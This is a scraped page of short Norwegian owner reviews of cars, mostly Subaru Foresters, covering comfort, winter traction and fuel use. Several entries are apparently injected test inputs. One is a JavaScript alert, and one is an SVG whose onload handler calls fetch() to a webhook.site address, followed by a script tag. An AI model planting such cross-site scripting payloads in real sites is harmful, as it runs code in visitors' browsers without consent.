Vurdert av DMC12
Subaru Forester (2018)
Forester = Driftsikkerhet, framkommelighet og god komfort. Med 2018 modellen kom adaptiv fartsholder, filholder mm. Med skinnseter og panoramasoltak får bilen det lille ekstra av luksus den trenger
Subaru Forester (2018)
Totalt sett kjempefornøyd. Hver tur er en glede. Fremkommelighet på vinterføre helt på topp
Subaru Forester (2018)
Bil nr 3 av samme type. Fornøyd eier.
Subaru Forester (2017)
Hadde ikke råd til bil OG traktor, så da ble det Subaru Forester.
Subaru Forester (2017)
Min Forester nr 4 og er kjempefornøyd. En av karakterene er kjøreglede. Gir lavest på den. Ikke derfor jeg velger Forester, men driftssikker, komfortabel, og en gjennomført god bil - den beste fr
Subaru Forester (2017)
Min andre Forester. God på sommeføre. Super på vinterføre. Som skapt for vinterkjøring med tung henger ( har forsøkt )
Subaru Forester (2017)
En veldig bra bil totalt sett. Veldig fin å kjøre, blir nok Subaru neste gang også
Subaru Forester (2017)
Trygg.
Subaru Forester (2017)
Helt fenomenal bil, og en fantastisk trekkvogn.
Subaru Forester (2017)
Vi er svært fornøyd med vår Forester. Glimrende komfort, god kvalitet og enorm fremkommelighet. Etter drøyt 50 000 kjørte kilometer så langt i år har bilen definitivt stått til forventningene.
Subaru Forester (2016)
Hatt en Legacy en Impreza og to Forester. Kjøp og service først hos Formo også hos Autostrada i Grenland Telemark. Svært fornøyd med Formo. Starten hos Autostrada også meget bra. Men etter omorg
Subaru Forester (2016)
Knallbra 4hjulstrekk! flott vinterbil! Denne kommer frem de utroligste steder, med praktisk Høyt og lav gir. Starter alltid uansett vær, og bruker forsåvidt lite drivstoff til at det er en konstant
Subaru Forester (2016)
Total en god bil er veldig godt 4wd og over alle en god bil fornøyde
Subaru Forester (2016)
Suveren soliditet,fremkommelighet og velutstyrt i Premiumutgave. Utmerket vinterbil,god motor/automatgir. Forsetekomfort kan bedres.
Subaru Forester (2016)
Grei bil i medium-suv segmentet. CVT gearkasse er håpløs for de som er vant til dobbelclutch eller konvensjonell gearkasse. Bensinforbruk er skyhøyt over 'brosjyreforbruk'. Undermotorisert.
Aston Martin DB9 GT (2017)
alert("total")
Aston Martin DB9 GT (2017)
totalvurderingtest
Abarth 500e (2024)
Abarth 500e (2024)
Abarth 500e (2024)
xxxfooo4
Abarth 500e (2024)
<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>
Volvo EX40 (2026)
Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass
Ford Explorer EV (2025)
Kommer nok til å bytte den ut pga den nervøse oppførselen på vinterføre. Utenom dette svarer den godt på alle parametre.
Ford Kuga (2021)
Forbruk. Gir en tier for forbruk langkjøring. 0,44 og forbruk 0,8 med campingvogn, totalvekt 1400 kg(ved tomt batteri). Rekkevidde elektrisk på vinter månedene er fra 20 - 30 km, blandet/bykjøring
Hongqi E-HS9 (2022)
Den er utrolig komfortabel, stille og har en kvalitet som overgår det meste på markedet. Har hatt bilen i 2år nå, å hele familien elsker bilen!
Mercedes-Benz EQC (2022)
Topp komfort og driftsikker.
Polestar 2 (2022)
God kvalitetsfølelse. Gode (frem-) seter. Smart med OTA (oppdateringer over-the-air). Lett å selv restarte system og app etter behov. Pen bil! Praktisk med frunk for elkabler på langtur. (hvorfor h
Mercedes-Benz GLE (2020)
Skuffende å måtte skifte opphengskuler foran på begge sider etter kun 75000 km
BMW 3-Serie (2012)
Hadde det vært et punkt som het eierglede så hadde jeg glatt gitt 10 av 10!! Bilen er vakker og tvers igjennom godt bygget! Nydelig å kjøre og det meste bærer preg av å være bygget med gode mat
MG ZS EV (2022)
Veldig godt fornøyd med bilen på alle måter tatt i betraktning at det var en forholdsvis rimelig bil.